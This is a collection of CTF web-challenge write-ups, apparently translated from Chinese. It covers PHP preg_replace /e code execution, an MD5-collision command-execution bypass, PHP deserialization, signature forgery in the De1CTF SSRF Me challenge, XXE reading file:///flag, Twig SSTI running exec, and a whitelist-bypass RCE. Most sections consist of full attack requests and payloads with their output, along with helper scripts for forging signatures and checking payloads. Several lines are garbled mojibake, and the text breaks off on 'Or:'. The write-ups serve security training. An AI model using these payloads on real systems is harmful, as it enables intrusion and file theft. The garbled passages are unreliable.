        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}
With the parameters substituted, preg_replace('/(' . $re . ')/ei', 'strtolower("\\1")', $str); is equivalent to preg_replace('/(\S*)/ei', 'strtolower("\\1")', '${getFlag()}');
PHP manual entry for strtolower():
strtolower (PHP 4, PHP 5, PHP 7, PHP 8) strtolower — make a string lowercase
PHP manual entry for preg_replace():
preg_replace (PHP 4, PHP 5, PHP 7, PHP 8) preg_replace — perform a regular expression search and replace. Description: preg_replace( mixed $pattern, mixed $replacement, mixed $subject) : mixed. Searches subject for matches of pattern and replaces them with replacement. Parameters: pattern, the pattern to search for; it can be a string or an array of strings, and PCRE modifiers can be used. replacement, the string or array of strings to replace with; see https://www.runoob.com/php/php-preg_replace.html for details. subject, the string or array of strings to search and replace.
preg_replace('/(\S*)/ei', 'strtolower("\\1")', '${getFlag()}'); first matches ${getFlag()} with the regex /(\S*)/ei. .* could also match the whole string ${getFlag()}, but when PHP parses the request it converts spaces, . and [ in parameter names to _. So .* cannot be used to match arbitrary characters and \S* is used instead: in regular expressions \s matches whitespace such as spaces, tabs and newlines, and \S matches every character other than those.
References
http://www.lmxspace.com/2018/08/12/一个有趣的preg-replace函数/
Matching ${getFlag()} with /(\S*)/ei produces exactly one match. The match is stored in a temporary buffer, and every captured sub-match is stored in the order it appears in the pattern from left to right. Buffers are numbered from 1, and up to 99 captured sub-expressions can be stored. Each buffer is accessed as '\n', where n is a one- or two-digit decimal number identifying the buffer. This match has a single result, so the only buffer number is 1. In \\1 the first \ is an escape character marking the second \ as a literal \ rather than a special character, so \\1 is \1, and \1 accesses the first buffer. Thus strtolower("\\1") becomes strtolower("${getFlag()}").
References
Backreferences https://wiki.jikexueyuan.com/project/regex/back-reference.html
The /e modifier of preg_replace treats the replacement parameter, i.e. the second argument of preg_replace, as php code and executes it via eval, provided that subject contains a match of pattern. So the last step of preg_replace('/(\S*)/ei', 'strtolower("\\1")', '${getFlag()}'); is to execute strtolower("${getFlag()}").
In PHP, variables are interpolated inside double-quoted strings but not inside single-quoted ones. "getFlag()" is just a string, but "${getFlag()}" is different.
References
Variable variables https://www.php.net/manual/zh/language.variables.variable.php
In ${getFlag()} the getFlag() is treated as a variable expression and evaluated first, so control enters the getFlag() function, which fetches the cmd value system('cat /flag') from the GET request; eval executes the string 'system('cat /flag')' as code, and the flag is printed. From the PHP manual:
eval (PHP 4, PHP 5, PHP 7, PHP 8) eval — evaluate a string as PHP code. Description: eval( string $code) : mixed. Evaluates the string code as PHP code.
References
http://www.lmxspace.com/2018/08/12/一个有趣的preg-replace函数/
https://www.runoob.com/php/php-preg_replace.html
https://regex101.com/
https://xz.aliyun.com/t/2557
[安洵杯 2019]easy_web
Entering the page gives an image; combined with the url, guess that the image name is encoded before the GET request is made.
Decode the img parameter value; decoding order: base64->base64->hex
555.png
References
CyberChef
So to get the source of index.php we encode in reverse:
hex->base64->base64 , with the result:
TmprMlpUWTBOalUzT0RKbE56QTJPRGN3
References
CyberChef
×¢Òâ¼ÓÃܲÎÊýÑϸñ°´ÕÕÈçÉÏÁ´½Ó¼ÓÃÜ,·ñÔòÓëÍøÒ³¼ÓÃÜ·½Ê½²»Æ¥Åä,µ¼ÖÂÕÒ²»µ½Îļþ¡£
ÊäÈëurl:
/index.php?img=TmprMlpUWTBOalUzT0RKbE56QTJPRGN3&cmd=
We get base64-encoded content; decoded it is:
<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
    header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
    echo '<img src ="./ctf3.jpeg">';
    die("xixi~ no flag");
} else {
    $txt = base64_encode(file_get_contents($file));
    echo "<img src='data:image/gif;base64," . $txt . "'></img>";
    echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
    echo("forbid ~");
    echo "<br>";
} else {
    if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
        echo `$cmd`;
    } else {
        echo ("md5 is funny ~");
    }
}
?>
<html>
<style>
body{
    background:url(./bj.png) no-repeat center center;
    background-size:cover;
    background-attachment:fixed;
    background-color:
}
</style>
<body>
</body>
</html>
todo»¹Ã»ÓзÖÎöÔ´Âë,ÒªÈÏÕæ¿´¡£
¹¹ÔìPOST ÇëÇó:
POST /index.php?cmd=dir%20/ HTTP/1.1
Host: e55e28a0-6ce5-44fc-9386-7275b7e65cba.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
The POST data a and b must be the last line, with no newline or blank line after it, otherwise the POST fails.
Response:
bin dev flag lib media opt root sbin sys usr
boot etc home lib64 mnt proc run srv tmp var
The flag is found. Build the request:
POST /index.php?cmd=ca\t%20/flag HTTP/1.1
Host: e55e28a0-6ce5-44fc-9386-7275b7e65cba.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
Get the flag. Or:
POST /index.php?cmd=strings%20/flag HTTP/1.1
Host: e55e28a0-6ce5-44fc-9386-7275b7e65cba.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
Or:
POST /index.php?cmd=sort%20/flag HTTP/1.1
Host: e55e28a0-6ce5-44fc-9386-7275b7e65cba.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 389
a=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2&b=%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2
sort treats each line of the file as a unit and compares the lines with each other, comparing from the first character onward by ASCII value, then outputs them in ascending order.
todo: why add %, and why does it not work without %.
References
Strong collision https://www.jianshu.com/p/c9089fd5b1ba
https://my.oschina.net/hetianlab/blog/4949531
https://xz.aliyun.com/t/6911
https://www.jianshu.com/p/f3fe31aeadf4
https://www.jianshu.com/p/21e3e1f74c08
https://www.cnblogs.com/wangtanzhi/p/12244096.html
https://www.wh1teze.top/articles/2020/02/04/1580806596938.html
[网鼎杯 2020 朱雀组]phpweb
Opening the page shows the message:
Warning: date(): It is not safe to rely on the system’s timezone settings. You are required to use the date.timezone setting or the date_default_timezone_set() function. In case you used any of those methods and you are still getting this warning, you most likely misspelled the timezone identifier. We selected the timezone ‘UTC’ for now, but please set date.timezone to select your timezone. in /var/www/html/index.php on line 24 2021-04-05 08:41:58 am
Build a request to read the index.php source:
POST /index.php HTTP/1.1
Host: e17ade30-58a8-469f-a158-4a16c6c2fa7f.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 34
func=file_get_contents&p=index.php
Replacing file_get_contents with highlight_file also works; show_source cannot be used.
The source:
<?php
$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");
function gettime($func, $p) {
    $result = call_user_func($func, $p);
    $a= gettype($result);
    if ($a == "string") {
        return $result;
    } else {return "";}
}
class Test {
    var $p = "Y-m-d h:i:s a";
    var $func = "date";
    function __destruct() {
        if ($this->func != "") {
            echo gettime($this->func, $this->p);
        }
    }
}
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];
if ($func != null) {
    $func = strtolower($func);
    if (!in_array($func,$disable_fun)) {
        echo gettime($func, $p);
    }else {
        die("Hacker...");
    }
}
?>
PHP manual entry for file_get_contents:
file_get_contents (PHP 4 >= 4.3.0, PHP 5, PHP 7, PHP 8) file_get_contents — read an entire file into a string. Description: file_get_contents( string $filename, bool $use_include_path = false, resource $context = ?, int $offset = -1, int $maxlen = ?) : string. Identical to file(), except that file_get_contents() returns the file in a string, starting at the specified offset and reading up to maxlen bytes. On failure, file_get_contents() returns false. file_get_contents() is the preferred way to read the contents of a file into a string; it uses memory-mapping techniques, if supported by the OS, to enhance performance. Note: to open a URL containing special characters (such as spaces) it must first be encoded with urlencode().
PHP manual entry for call_user_func:
call_user_func (PHP 4, PHP 5, PHP 7, PHP 8) call_user_func — call the callback given by the first parameter. Description: call_user_func( callable $callback, mixed $parameter = ?, mixed $... = ?) : mixed. The first parameter callback is the callback to be called; the remaining parameters are passed to it as arguments.
Example of call_user_func()
<?php
function barber($type)
{
echo "You wanted a $type haircut, no problem\n";
}
call_user_func('barber', "mushroom");
call_user_func('barber', "shave");
?>
The above example will output:
You wanted a mushroom haircut, no problem
You wanted a shave haircut, no problem
The Test class has a __destruct magic method, and unserialize is not in the blacklist, so this is a deserialization attack. Build a serialized Test object whose func and p properties are the function and argument we want; unserialize restores it to a Test object, and when the script ends __destruct runs gettime($this->func, $this->p), i.e. call_user_func with an attacker-controlled callback and argument, which is arbitrary code execution. The in_array blacklist check only inspects the top-level func parameter; the func property inside the object is never checked.
When exploiting PHP deserialization, the entry points are the magic methods, so check whether any of them performs a sensitive operation. The common ones:
__construct() // triggered when an object is created
__destruct() // triggered when an object is destroyed
__call() // triggered when an inaccessible method is called in object context
__callStatic() // triggered when an inaccessible method is called in static context
__get() // reads data from an inaccessible property
__set() // writes data to an inaccessible property
__isset() // triggered by isset() or empty() on an inaccessible property
__unset() // triggered by unset() on an inaccessible property
__invoke() // triggered when the script tries to call an object as a function
PHP code to produce the serialized payload:
<?php
class Test {
var $p = "cat $(find / -name flag*)";
var $func = "system";
}
$a = new Test();
echo serialize($a);
?>
In PHP a class property must be declared public, protected or private; without one of those modifiers the var keyword is required, and var is an alias for public. Output:
O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}
Construct the request:
POST /index.php HTTP/1.1
Host: e17ade30-58a8-469f-a158-4a16c6c2fa7f.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:25:"cat $(find / -name flag*)";s:4:"func";s:6:"system";}
Got the flag.
Namespaces were introduced in PHP 5.3, for classes, functions and constants alike (PHP 5.6 only added the use function / use const import syntax). A leading backslash makes a name fully qualified: from inside a namespace, \strlen, \INI_ALL and \Exception refer to the global function, constant and class. Example:
<?php
namespace Foo;
function strlen() {}
const INI_ALL = 3;
class Exception {}
$a = \strlen('hi');
$b = \INI_ALL;
$c = new \Exception('error');
?>
References
https://www.runoob.com/php/php-namespace.html
Construct the request. The blacklist is a string comparison, so \system is not matched by in_array, but call_user_func resolves the fully qualified name \system to the global system():
POST / HTTP/1.1
Host: e17ade30-58a8-469f-a158-4a16c6c2fa7f.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
func=\system&p=cat $(find / -name flag*)
Got the flag.
References
https://www.anquanke.com/post/id/205679
[De1CTF 2019]SSRF Me
Open the page; it shows the source:
from flask import Flask
from flask import request
import socket
import hashlib
import urllib
import sys
import os
import json
reload(sys)
sys.setdefaultencoding('latin1')
app = Flask(__name__)
secert_key = os.urandom(16)
class Task:
def __init__(self, action, param, sign, ip):
self.action = action
self.param = param
self.sign = sign
self.sandbox = md5(ip)
if(not os.path.exists(self.sandbox)):
os.mkdir(self.sandbox)
def Exec(self):
result = {}
result['code'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
else:
print(resp)
tmpfile.write(resp)
tmpfile.close()
result['code'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()
if result['code'] == 500:
result['data'] = "Action Error"
else:
result['code'] = 500
result['msg'] = "Sign Error"
return result
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
if(waf(param)):
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())
@app.route('/')
def index():
return open("code.txt","r").read()
def scan(param):
socket.setdefaulttimeout(1)
try:
return urllib.urlopen(param).read()[:50]
except:
return "Connection Timeout"
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()
def md5(content):
return hashlib.md5(content).hexdigest()
def waf(param):
check=param.strip().lower()
if check.startswith("gopher") or check.startswith("file"):
return True
else:
return False
if __name__ == '__main__':
app.debug = False
app.run(host='0.0.0.0',port=80)
The hint says flag is in ./flag.txt, so that is the file to read. The Task class at the top is used later; first look at this part:
@app.route("/geneSign", methods=['GET', 'POST'])
def geneSign():
param = urllib.unquote(request.args.get("param", ""))
action = "scan"
return getSign(action, param)
The /geneSign route accepts GET and POST, takes param from the query string, fixes action to "scan" and returns getSign(action, param). That is an md5 over secert_key + param + action: we do not know secert_key, but the three pieces are simply concatenated with no delimiter.
def getSign(action, param):
return hashlib.md5(secert_key + param + action).hexdigest()
Next:
@app.route('/De1ta',methods=['GET','POST'])
def challenge():
action = urllib.unquote(request.cookies.get("action"))
param = urllib.unquote(request.args.get("param", ""))
sign = urllib.unquote(request.cookies.get("sign"))
ip = request.remote_addr
if(waf(param)):
return "No Hacker!!!!"
task = Task(action, param, sign, ip)
return json.dumps(task.Exec())
action and sign are taken from cookies and param from the query string; waf() only rejects a param that starts with gopher or file. A Task is then instantiated and Exec is called:
def Exec(self):
result = {}
result['code'] = 500
if (self.checkSign()):
if "scan" in self.action:
tmpfile = open("./%s/result.txt" % self.sandbox, 'w')
resp = scan(self.param)
if (resp == "Connection Timeout"):
result['data'] = resp
else:
print(resp)
tmpfile.write(resp)
tmpfile.close()
result['code'] = 200
if "read" in self.action:
f = open("./%s/result.txt" % self.sandbox, 'r')
result['code'] = 200
result['data'] = f.read()
if result['code'] == 500:
result['data'] = "Action Error"
else:
result['code'] = 500
result['msg'] = "Sign Error"
return result
The first branch calls:
def checkSign(self):
if (getSign(self.action, self.param) == self.sign):
return True
else:
return False
To make this return True, sign must equal md5(secert_key + param + action) for the action and param we send. We cannot compute that without secert_key, but /geneSign computes it for us, with action fixed to scan.
Suppose secert_key is xxx. Requesting /geneSign?param=flag.txt returns md5('xxx' + 'flag.txt' + 'scan'), i.e. md5('xxxflag.txtscan'). But Exec only returns the file contents when "read" appears in action, so the hashed string also has to contain read.
So request /geneSign?param=flag.txtread instead: the result is md5('xxx' + 'flag.txtread' + 'scan'), i.e. md5('xxxflag.txtreadscan').
That is exactly what checkSign computes for /De1ta?param=flag.txt with the cookie action=readscan; sign=<the md5 returned by geneSign>, because getSign('readscan', 'flag.txt') also hashes 'xxxflag.txtreadscan': the boundary between param and action has moved, but the concatenated string is identical. Exec tests "scan" in self.action and "read" in self.action as substring checks, so readscan does both: scan() calls urllib.urlopen('flag.txt'), which opens the local file, its content is written to result.txt in the sandbox, and the read branch returns it.
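As an added example (not part of the original writeup or of the challenge code), the following Python reproduces the signing scheme with a constructed demo key and shows why the oracle can be abused: getSign concatenates key, param and action with no delimiter, so the boundary between the two fields is invisible to md5. It also shows a hypothetical hardened variant (HMAC over length-prefixed fields) on which the same forgery fails. The key value and the hardened functions and their names are assumptions made for the demo.

```python
import hashlib
import hmac

# Constructed demo key; the server used os.urandom(16), which the attacker never learns.
SECRET_KEY = b"demo-secret-key-0123"


def get_sign(action, param):
    """The challenge's getSign: md5(key + param + action), plain concatenation."""
    return hashlib.md5(SECRET_KEY + param + action).hexdigest()


def gene_sign(param):
    """/geneSign oracle: param is attacker-chosen, action is pinned to b'scan'."""
    return get_sign(b"scan", param)


def check_sign(action, param, sign):
    """/De1ta checkSign: action and sign come from cookies, param from the query string."""
    return get_sign(action, param) == sign


def forge(param, wanted_action):
    """Put the wanted action at the end of the oracle's param, then present it as the
    start of the action: key|param|wanted_action|scan is the same byte string either way."""
    sign = gene_sign(param + wanted_action)
    return wanted_action + b"scan", sign


def get_sign_hardened(action, param):
    """Hypothetical fix: keyed hash over an unambiguous, length-prefixed encoding."""
    msg = b"".join(len(f).to_bytes(4, "big") + f for f in (action, param))
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def check_sign_hardened(action, param, sign):
    """Constant-time comparison of the hardened signature."""
    return hmac.compare_digest(get_sign_hardened(action, param), sign)
```

One oracle request is enough, and the waf is irrelevant: it only inspects param on /De1ta, and flag.txt starts with neither gopher nor file. The hardened variant still leaves an oracle that signs attacker-chosen params, so in a real service the signing endpoint itself would have to go, but a signature obtained for one (action, param) pair no longer verifies for any other split of the same bytes.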
References
https://xz.aliyun.com/t/5927
Enter the URL:
/geneSign?param=flag.txtread
The page shows:
9ece1fef99cc22596320b6f27448168b
Construct the request:
GET /De1ta?param=flag.txt HTTP/1.1
Host: 5912f2b9-ba90-4eaf-b521-2e7c2f565054.node3.buuoj.cn
cookie: action=readscan;sign=9ece1fef99cc22596320b6f27448168b
Note the two blank lines after the headers. Got the flag.
todo: learn the hash length extension attack
todo: local_file: bypass https://xz.aliyun.com/t/6050
References
https://joychou.org/web/hash-length-extension-attack.html
[NCTF2019]Fake XML cookbook
This challenge uses XXE (XML External Entity Injection). XML is not a replacement for HTML; the two were designed for different purposes:
XML was designed to transport and store data, with the focus on what the data is. HTML was designed to display data, with the focus on how it looks. HTML is about presenting information, XML about carrying it.
In XML, data can be placed in entities, and the document is constrained by a DTD that declares which elements and attributes are legal and how elements may nest. An entity is given a name and can then be referenced anywhere in the document. For example:
<!DOCTYPE note [
<!ENTITY writer "Dawn">
<!ENTITY copyright "Copyright W3School.com.cn">
]>
<test>&writer;&copyright;</test>
With an internal DTD the declarations are placed inside the XML document itself, in the form:
<!DOCTYPE root-element [element declarations]>
References
https://xz.aliyun.com/t/6887#toc-5
Construct the request:
POST /doLogin.php HTTP/1.1
Host: 778da916-8c2e-4588-8d6e-11a5f019e8e0.node3.buuoj.cn
X-Requested-With: XMLHttpRequest
Content-Length: 122
<!DOCTYPE xxe [
<!ENTITY flag SYSTEM "file:///flag" >
]>
<user><username>&flag;</username><password>1</password></user>
Got the flag. The SYSTEM keyword makes the parser load the external entity from file:///flag and substitute its content wherever &flag; is referenced; since the application echoes the username back, the file content appears in the response.
It can also be written as:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE xxe [
<!ENTITY flag SYSTEM "file:///flag" >
]>
<user><username>&flag;</username><password>1</password></user>
<?xml version="1.0" encoding="utf-8"?> is the XML prolog (declaration). It states the document's version and encoding, is optional, and when present must be the very first thing in the document.
References
https://blog.csdn.net/SopRomeo/article/details/105913611
[ASIS 2019]Unicorn shop
Open the page and press F12; the page head contains:
<meta charset="utf-8">
So the challenge is about character handling; consider the security of UTF-8 conversions.
References
https://xz.aliyun.com/t/5402
When buying the fourth item, the page says:
Only one char(?) allowed!
But 1337 is four characters, so we look for a single character that stands for ten thousand or more, anything above the fourth item's price. The Roman numeral ten thousand ↂ (U+2182) qualifies: Unicode assigns it the numeric value 10000 (Python's unicodedata.numeric('ↂ') returns 10000.0, which is what a numeric conversion on the server sees), and its UTF-8 encoding is E2 86 82, so enter on the site:
%E2%86%82
Got the flag.
References
https://unicode-table.com/cn/2182/
https://blog.csdn.net/SopRomeo/article/details/105465756
[BJDCTF2020]Cookie is so stable
Open the page, go to the hint page and press F12; a comment there (not reproduced here) says that cookies are the key to the challenge. Check the page's cookies:
cd59048e3172da4d60685556df9ccf9b
Intercepting the request on the id submission page, the cookie is unchanged:
POST /flag.php HTTP/1.1
Host: a85606d6-0af3-479e-8a7c-05a7a9b11acb.node3.buuoj.cn
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=cd59048e3172da4d60685556df9ccf9b
Connection: close
Content-Length: 24
username=1&submit=submit
Changing username has no effect. Submitting the id without intercepting and entering 1, the page shows hello 1; intercepting the page refresh:
GET /flag.php HTTP/1.1
Host: a85606d6-0af3-479e-8a7c-05a7a9b11acb.node3.buuoj.cn
Cookie: PHPSESSID=cd59048e3172da4d60685556df9ccf9b; user=1
Note the two blank lines. Now changing user changes the page content, so this is the injection point. First determine which template engine is in use.
The usual procedure for identifying the engine:
- Enter ${7*7} at the suspected point; if the result is 49, the input is evaluated.
- Then enter a{*comment*}b; if that works it is the Smarty engine, and so on.
Different engines often evaluate the same probe {{7*'7'}}, but the results differ:
in Twig the result is 49, in Jinja2 it is 7777777.
References
https://zhuanlan.zhihu.com/p/28823933
https://my.oschina.net/u/4588149/blog/4408349
Setting user to {{7*'7'}} makes the page show 49, so it is Twig. A payload against Twig (1.x): registerUndefinedFilterCallback registers exec as the callback used to resolve unknown filter names, and getFilter("id") then calls exec("id"):
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
Construct the request:
GET /flag.php HTTP/1.1
Host: a85606d6-0af3-479e-8a7c-05a7a9b11acb.node3.buuoj.cn
Cookie: PHPSESSID=cd59048e3172da4d60685556df9ccf9b; user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
The page shows the flag; in Burp Suite leave two blank lines after the Cookie header.
Tags of the various template engines (figure not reproduced here).
References
https://www.cnblogs.com/bmjoker/p/13508538.html
https://my.oschina.net/u/4588149/blog/4408349
https://www.cnblogs.com/wkzb/p/12422190.html
https://zhuanlan.zhihu.com/p/28823933
https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig
https://www.cnblogs.com/wangtanzhi/p/12330542.html
[CISCN 2019 初赛]Love Math
Open the page; the source is shown:
<?php
error_reporting(0);
if(!isset($_GET['c'])){
show_source(__FILE__);
}else{
$content = $_GET['c'];
if (strlen($content) >= 80) {
die("太长了不会算"); // "too long, can't compute"
}
$blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
foreach ($blacklist as $blackitem) {
if (preg_match('/' . $blackitem . '/m', $content)) {
die("请不要输入奇奇怪怪的字符"); // "please don't input strange characters"
}
}
$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'base_convert', 'bindec', 'ceil', 'cos', 'cosh', 'decbin', 'dechex', 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
foreach ($used_funcs[0] as $func) {
if (!in_array($func, $whitelist)) {
die("请不要输入奇奇怪怪的函数"); // "please don't input strange functions"
}
}
eval('echo '.$content.';');
}
Without the filters the GET request would be:
/?c=system("cat /flag")
The regex /[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/ with preg_match_all extracts every identifier-like token in c, and each one must be in the whitelist; $ is not part of the token, so $pi contributes the token pi, which is whitelisted. The straightforward variable-function form would be:
/?c=($_GET[a])($_GET[b])&a=system&b=cat /flag
but [ and ] are blacklisted and _GET, a and b are not whitelisted, so it dies. The payload therefore has to be built from whitelisted names only: base_convert(37907361743,10,36) returns "hex2bin", dechex(1598506324) returns "5f474554", and hex2bin("5f474554") is "_GET", so $pi = "_GET" and ($$pi){pi} is $_GET['pi'] (curly-brace array access, removed in PHP 8). The final URL, 79 characters, just under the 80 limit:
/?c=$pi=base_convert(37907361743,10,36)(dechex(1598506324));($$pi){pi}(($$pi){cos})&pi=system&cos=cat /flag
cat /flag contains a space, yet the page does not answer with "please don't input strange characters", because the blacklist is applied only to $_GET['c']; the values of the pi and cos parameters are never inspected.
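The following Python, an added example rather than the challenge's own code, ports the three checks from the PHP source (length, character blacklist, identifier whitelist) and computes the two numbers used in the payload, so a payload can be verified locally before it is sent. The helper names and the choice of pi and cos as the extra parameter names are the only assumptions.

```python
import re

# The challenge's filters, ported from the PHP source. Only $_GET['c'] is inspected.
BLACKLIST = [r" ", r"\t", r"\r", r"\n", r"'", r'"', r"`", r"\[", r"\]"]
WHITELIST = {
    "abs", "acos", "acosh", "asin", "asinh", "atan2", "atan", "atanh", "base_convert",
    "bindec", "ceil", "cos", "cosh", "decbin", "dechex", "decoct", "deg2rad", "exp",
    "expm1", "floor", "fmod", "getrandmax", "hexdec", "hypot", "is_finite",
    "is_infinite", "is_nan", "lcg_value", "log10", "log1p", "log", "max", "min",
    "mt_getrandmax", "mt_rand", "mt_srand", "octdec", "pi", "pow", "rad2deg", "rand",
    "round", "sin", "sinh", "sqrt", "srand", "tan", "tanh",
}
IDENT = re.compile(r"[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*")
B36 = "0123456789abcdefghijklmnopqrstuvwxyz"


def check_c(content):
    """Return 'ok' if the challenge would eval() this c, else the reason it dies."""
    if len(content) >= 80:
        return "too long"
    for pat in BLACKLIST:                      # same order as the PHP: chars first
        if re.search(pat, content, re.M):
            return "bad char"
    for tok in IDENT.findall(content):         # every token, not just the first
        if tok not in WHITELIST:
            return "bad func: " + tok
    return "ok"


def to_base36(name):
    """Decimal n such that PHP base_convert(n, 10, 36) prints name ([0-9a-z] only)."""
    if not re.fullmatch(r"[0-9a-z]+", name):
        raise ValueError("base_convert can only produce [0-9a-z]")
    return int(name, 36)


def from_base36(n):
    """What PHP base_convert(n, 10, 36) prints, to confirm the round trip."""
    out = ""
    while n:
        n, r = divmod(n, 36)
        out = B36[r] + out
    return out or "0"


def dechex_arg(s):
    """Decimal n such that hex2bin(dechex(n)) == s; covers names with '_' or uppercase."""
    return int(s.encode().hex(), 16)


def build_payload(func_key="pi", arg_key="cos"):
    """$pi = hex2bin('5f474554') = '_GET'; ($$pi){pi} is $_GET['pi'] (brace access, PHP < 8).
    func_key/arg_key must themselves be whitelisted tokens."""
    return "$pi=base_convert(%d,10,36)(dechex(%d));($$pi){%s}(($$pi){%s})" % (
        to_base36("hex2bin"), dechex_arg("_GET"), func_key, arg_key)
```

The full request is then /?c=<payload>&pi=system&cos=cat /flag: the space in cat /flag never reaches check_c because it travels in a parameter the PHP code does not look at.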
References
https://cloud.tencent.com/developer/article/1600943
Or:
